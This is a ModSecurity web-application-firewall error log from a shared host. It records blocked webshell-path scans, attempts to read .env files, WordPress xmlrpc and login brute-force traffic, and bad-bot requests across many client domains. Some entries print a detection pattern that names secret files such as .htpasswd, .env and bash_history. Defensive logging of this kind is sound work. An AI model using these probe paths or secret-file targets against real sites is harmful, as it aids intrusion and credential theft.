[Tue May 26 13:53:37.458771 2026] [security2:error] [pid 560287:tid 560481] [client 185.192.71.241:48631] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 241.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-includes/js/jquery/bypass.php"] [unique_id "ahVYiZmX5s6sDS3wJVch1gAAAMA"]
[Tue May 26 13:53:37.475740 2026] [security2:error] [pid 555743:tid 555881] [client 69.12.64.53:44274] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "omshriinfrastructures.com"] [uri "/backend/.env"] [unique_id "ahVYicjqAquC0YaxQjC_5QAAARI"]
[Tue May 26 13:53:37.477341 2026] [security2:error] [pid 555743:tid 555966] [client 69.12.64.53:44276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "omshriinfrastructures.com"] [uri "/api/.env"] [unique_id "ahVYicjqAquC0YaxQjC_5AAAAWc"]
[Tue May 26 13:53:38.047647 2026] [security2:error] [pid 560287:tid 560540] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYiZmX5s6sDS3wJVch5gAAAPg"]
[Tue May 26 13:53:38.832458 2026] [security2:error] [pid 555743:tid 555907] [client 185.92.25.100:57463] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 100.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-includes/xl2023.php"] [unique_id "ahVYisjqAquC0YaxQjDAAwAAASw"]
[Tue May 26 13:53:39.248239 2026] [security2:error] [pid 555743:tid 555937] [client 185.192.71.228:45733] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-includes/certificates/admin.php"] [unique_id "ahVYi8jqAquC0YaxQjDADAAAAUo"]
[Tue May 26 13:53:39.900686 2026] [security2:error] [pid 560287:tid 560499] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYi5mX5s6sDS3wJVciBwAAANI"]
[Tue May 26 13:53:40.059952 2026] [security2:error] [pid 560287:tid 560467] [client 185.92.25.98:44769] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-includes/images/media/dog.php"] [unique_id "ahVYjJmX5s6sDS3wJVciGwAAALQ"]
[Tue May 26 13:53:40.412542 2026] [security2:error] [pid 560287:tid 560502] [client 91.230.225.165:49567] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/xp.php"] [unique_id "ahVYjJmX5s6sDS3wJVciJgAAANQ"]
[Tue May 26 13:53:40.976872 2026] [security2:error] [pid 555743:tid 555938] [client 74.249.173.207:40707] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kmmc.co.in.svijaykumar.in"] [uri "/wk/index.php"] [unique_id "ahVYjMjqAquC0YaxQjDAJwAAAUs"]
[Tue May 26 13:53:40.991315 2026] [security2:error] [pid 555743:tid 555932] [client 91.230.225.175:55825] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 175.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-includes/SimplePie/applicationd.php"] [unique_id "ahVYjMjqAquC0YaxQjDAKAAAAUU"]
[Tue May 26 13:53:41.377652 2026] [security2:error] [pid 555743:tid 555966] [client 185.192.71.229:36921] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 229.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-includes/assets/index.php"] [unique_id "ahVYjcjqAquC0YaxQjDALQAAAWc"]
[Tue May 26 13:53:41.397953 2026] [security2:error] [pid 560287:tid 560433] [client 34.24.149.205:58896] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 205.149.24.34.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rsmsi.org.in"] [uri "/xmlrpc.php"] [unique_id "ahVYjZmX5s6sDS3wJVciOwAAAJQ"]
[Tue May 26 13:53:41.398026 2026] [security2:error] [pid 560287:tid 560491] [client 85.208.96.204:54398] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/january-2nd/day/2025-02-25/"] [unique_id "ahVYjZmX5s6sDS3wJVciPgAAAMo"]
[Tue May 26 13:53:41.398177 2026] [security2:error] [pid 560287:tid 560491] [client 85.208.96.204:54398] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/january-2nd/day/2025-02-25/"] [unique_id "ahVYjZmX5s6sDS3wJVciPgAAAMo"]
[Tue May 26 13:53:41.574441 2026] [security2:error] [pid 560287:tid 560458] [client 34.24.149.205:51611] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "rsmsi.org.in"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahVYjZmX5s6sDS3wJVciQQAAAKs"]
[Tue May 26 13:53:41.653203 2026] [security2:error] [pid 560287:tid 560506] [client 201.137.246.134:36647] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "taotechservices.com"] [uri "/wp-comments-post.php"] [unique_id "ahVYjZmX5s6sDS3wJVciQgAAANg"]
[Tue May 26 13:53:41.730059 2026] [security2:error] [pid 560287:tid 560532] [client 34.24.149.205:56235] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "rsmsi.org.in"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahVYjZmX5s6sDS3wJVciRAAAAPI"]
[Tue May 26 13:53:41.740853 2026] [security2:error] [pid 560287:tid 560506] [client 201.137.246.134:36647] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "500"] [hostname "taotechservices.com"] [uri "/wp-comments-post.php"] [unique_id "ahVYjZmX5s6sDS3wJVciQgAAANg"]
[Tue May 26 13:53:41.748302 2026] [security2:error] [pid 560287:tid 560519] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYjZmX5s6sDS3wJVciPQAAAOU"]
[Tue May 26 13:53:41.885449 2026] [security2:error] [pid 560287:tid 560447] [client 34.24.149.205:55925] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "rsmsi.org.in"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahVYjZmX5s6sDS3wJVciUgAAAKE"]
[Tue May 26 13:53:42.033373 2026] [security2:error] [pid 555743:tid 555935] [client 34.24.149.205:58937] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "rsmsi.org.in"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahVYjsjqAquC0YaxQjDARQAAAUg"]
[Tue May 26 13:53:42.236060 2026] [security2:error] [pid 555743:tid 555946] [client 34.24.149.205:62069] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "rsmsi.org.in"] [uri "/2020/wp-includes/wlwmanifest.xml"] [unique_id "ahVYjsjqAquC0YaxQjDASAAAAVM"]
[Tue May 26 13:53:42.378600 2026] [security2:error] [pid 560287:tid 560552] [client 34.24.149.205:64024] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "rsmsi.org.in"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahVYjpmX5s6sDS3wJVciVgAAAQQ"]
[Tue May 26 13:53:42.527173 2026] [security2:error] [pid 560287:tid 560498] [client 34.24.149.205:62298] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "rsmsi.org.in"] [uri "/2021/wp-includes/wlwmanifest.xml"] [unique_id "ahVYjpmX5s6sDS3wJVciWAAAANE"]
[Tue May 26 13:53:42.691504 2026] [security2:error] [pid 560287:tid 560488] [client 34.24.149.205:50496] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "rsmsi.org.in"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahVYjpmX5s6sDS3wJVciXAAAAMc"]
[Tue May 26 13:53:42.824034 2026] [security2:error] [pid 560287:tid 560470] [client 34.24.149.205:50538] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "rsmsi.org.in"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahVYjpmX5s6sDS3wJVciYAAAALY"]
[Tue May 26 13:53:42.991675 2026] [security2:error] [pid 560287:tid 560484] [client 34.24.149.205:52339] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "rsmsi.org.in"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahVYjpmX5s6sDS3wJVciagAAAMM"]
[Tue May 26 13:53:43.131609 2026] [security2:error] [pid 560287:tid 560419] [client 34.24.149.205:54277] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "rsmsi.org.in"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahVYj5mX5s6sDS3wJVcibgAAAIY"]
[Tue May 26 13:53:43.307538 2026] [security2:error] [pid 560287:tid 560508] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYjpmX5s6sDS3wJVciaQAAANo"]
[Tue May 26 13:53:44.013800 2026] [security2:error] [pid 560287:tid 560421] [client 216.244.66.241:51534] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ghanemgh.com"] [uri "/mirycece/fabadb1251117.shtml"] [unique_id "ahVYkJmX5s6sDS3wJVcifgAAAIg"]
[Tue May 26 13:53:44.014929 2026] [security2:error] [pid 560287:tid 560421] [client 216.244.66.241:51534] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ghanemgh.com"] [uri "/mirycece/fabadb1251117.shtml"] [unique_id "ahVYkJmX5s6sDS3wJVcifgAAAIg"]
[Tue May 26 13:53:44.810756 2026] [security2:error] [pid 555743:tid 555891] [client 129.222.147.134:21999] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVYkMjqAquC0YaxQjDAhgAAARw"]
[Tue May 26 13:53:44.814606 2026] [security2:error] [pid 555743:tid 555891] [client 129.222.147.134:21999] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVYkMjqAquC0YaxQjDAhgAAARw"]
[Tue May 26 13:53:44.955591 2026] [security2:error] [pid 555743:tid 555925] [client 74.249.173.207:40704] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kmmc.co.in.svijaykumar.in"] [uri "/inputs.php"] [unique_id "ahVYkMjqAquC0YaxQjDAkQAAAT4"]
[Tue May 26 13:53:45.232309 2026] [security2:error] [pid 560287:tid 560534] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYkJmX5s6sDS3wJVcijAAAAPQ"]
[Tue May 26 13:53:45.939983 2026] [security2:error] [pid 560287:tid 560419] [client 74.249.173.207:40710] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kmmc.co.in.svijaykumar.in"] [uri "/ioxi-o.php"] [unique_id "ahVYkZmX5s6sDS3wJVcipgAAAIY"]
[Tue May 26 13:53:46.879966 2026] [security2:error] [pid 560287:tid 560478] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYkpmX5s6sDS3wJVcisgAAAL4"]
[Tue May 26 13:53:47.061029 2026] [security2:error] [pid 560287:tid 560328] [remote 47.128.115.253:64382] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "agsnails.com"] [uri "/robots.txt"] [unique_id "ahVYk5mX5s6sDS3wJVcivgAArig"]
[Tue May 26 13:53:47.187761 2026] [security2:error] [pid 560287:tid 560436] [client 106.192.248.115:54836] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVYk5mX5s6sDS3wJVciwwAAAJc"]
[Tue May 26 13:53:47.187899 2026] [security2:error] [pid 560287:tid 560436] [client 106.192.248.115:54836] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVYk5mX5s6sDS3wJVciwwAAAJc"]
[Tue May 26 13:53:48.042044 2026] [security2:error] [pid 560287:tid 560447] [client 104.28.71.84:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVYk5mX5s6sDS3wJVci1QAAAKE"]
[Tue May 26 13:53:48.132112 2026] [security2:error] [pid 560287:tid 560552] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYk5mX5s6sDS3wJVci0gAAAQQ"]
[Tue May 26 13:53:49.731849 2026] [security2:error] [pid 555743:tid 555897] [client 74.249.173.207:40712] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.kexcouriers.com"] [uri "/wk/index.php"] [unique_id "ahVYlcjqAquC0YaxQjDAtAAAASI"]
[Tue May 26 13:53:50.556517 2026] [security2:error] [pid 560287:tid 560422] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYlpmX5s6sDS3wJVcjAwAAAIk"]
[Tue May 26 13:53:51.707504 2026] [security2:error] [pid 560287:tid 560488] [client 202.76.191.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYl5mX5s6sDS3wJVcjGQAAAMc"]
[Tue May 26 13:53:52.226367 2026] [security2:error] [pid 555743:tid 555885] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYl8jqAquC0YaxQjDAzAAAARY"]
[Tue May 26 13:53:53.171413 2026] [security2:error] [pid 555743:tid 555758] [remote 45.250.255.226:44590] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 226.255.250.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "haddingtonwines.com"] [uri "/wp-login.php"] [unique_id "ahVYmMjqAquC0YaxQjDA4QABZw4"]
[Tue May 26 13:53:53.479336 2026] [security2:error] [pid 560287:tid 560318] [remote 95.216.117.13:47564] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "nicmaperu.com"] [uri "/wp-login.php"] [unique_id "ahVYmZmX5s6sDS3wJVcjSQAA5h4"]
[Tue May 26 13:53:53.488832 2026] [security2:error] [pid 555743:tid 555968] [client 74.249.173.207:5377] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kmmc.co.in.svijaykumar.in"] [uri "/function/function.php"] [unique_id "ahVYmcjqAquC0YaxQjDA7AAAAWk"]
[Tue May 26 13:53:54.032459 2026] [security2:error] [pid 560287:tid 560526] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYmZmX5s6sDS3wJVcjTQAAAOw"]
[Tue May 26 13:53:54.541020 2026] [security2:error] [pid 555743:tid 555902] [client 185.121.232.229:62519] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "185.121.232.229" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "atreegroup.com"] [uri "/wp-comments-post.php"] [unique_id "ahVYmsjqAquC0YaxQjDA_QAAASc"], referer: https://atreegroup.com/2022/12/15/architecture-is-not-based-on-concrete/
[Tue May 26 13:53:54.541110 2026] [security2:error] [pid 555743:tid 555902] [client 185.121.232.229:62519] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "atreegroup.com"] [uri "/wp-comments-post.php"] [unique_id "ahVYmsjqAquC0YaxQjDA_QAAASc"], referer: https://atreegroup.com/2022/12/15/architecture-is-not-based-on-concrete/
[Tue May 26 13:53:54.922664 2026] [security2:error] [pid 555743:tid 555779] [remote 195.250.23.247:44900] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 247.23.250.195.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonweb.com"] [uri "/wp-login.php"] [unique_id "ahVYmsjqAquC0YaxQjDBAgABWyM"]
[Tue May 26 13:53:55.225530 2026] [security2:error] [pid 555743:tid 555978] [client 129.222.147.134:11334] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVYm8jqAquC0YaxQjDBCwAAAXM"]
[Tue May 26 13:53:55.225677 2026] [security2:error] [pid 555743:tid 555978] [client 129.222.147.134:11334] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVYm8jqAquC0YaxQjDBCwAAAXM"]
[Tue May 26 13:53:55.241646 2026] [security2:error] [pid 555743:tid 555892] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYmsjqAquC0YaxQjDBBAAAAR0"]
[Tue May 26 13:53:56.978906 2026] [security2:error] [pid 560287:tid 560304] [remote 51.91.98.45:60738] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahVYnJmX5s6sDS3wJVcjhgAA1hA"]
[Tue May 26 13:53:57.511016 2026] [security2:error] [pid 555743:tid 555891] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYncjqAquC0YaxQjDBMwAAARw"]
[Tue May 26 13:53:57.737075 2026] [security2:error] [pid 560287:tid 560457] [client 106.192.248.115:55148] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVYnZmX5s6sDS3wJVcjjwAAAKo"]
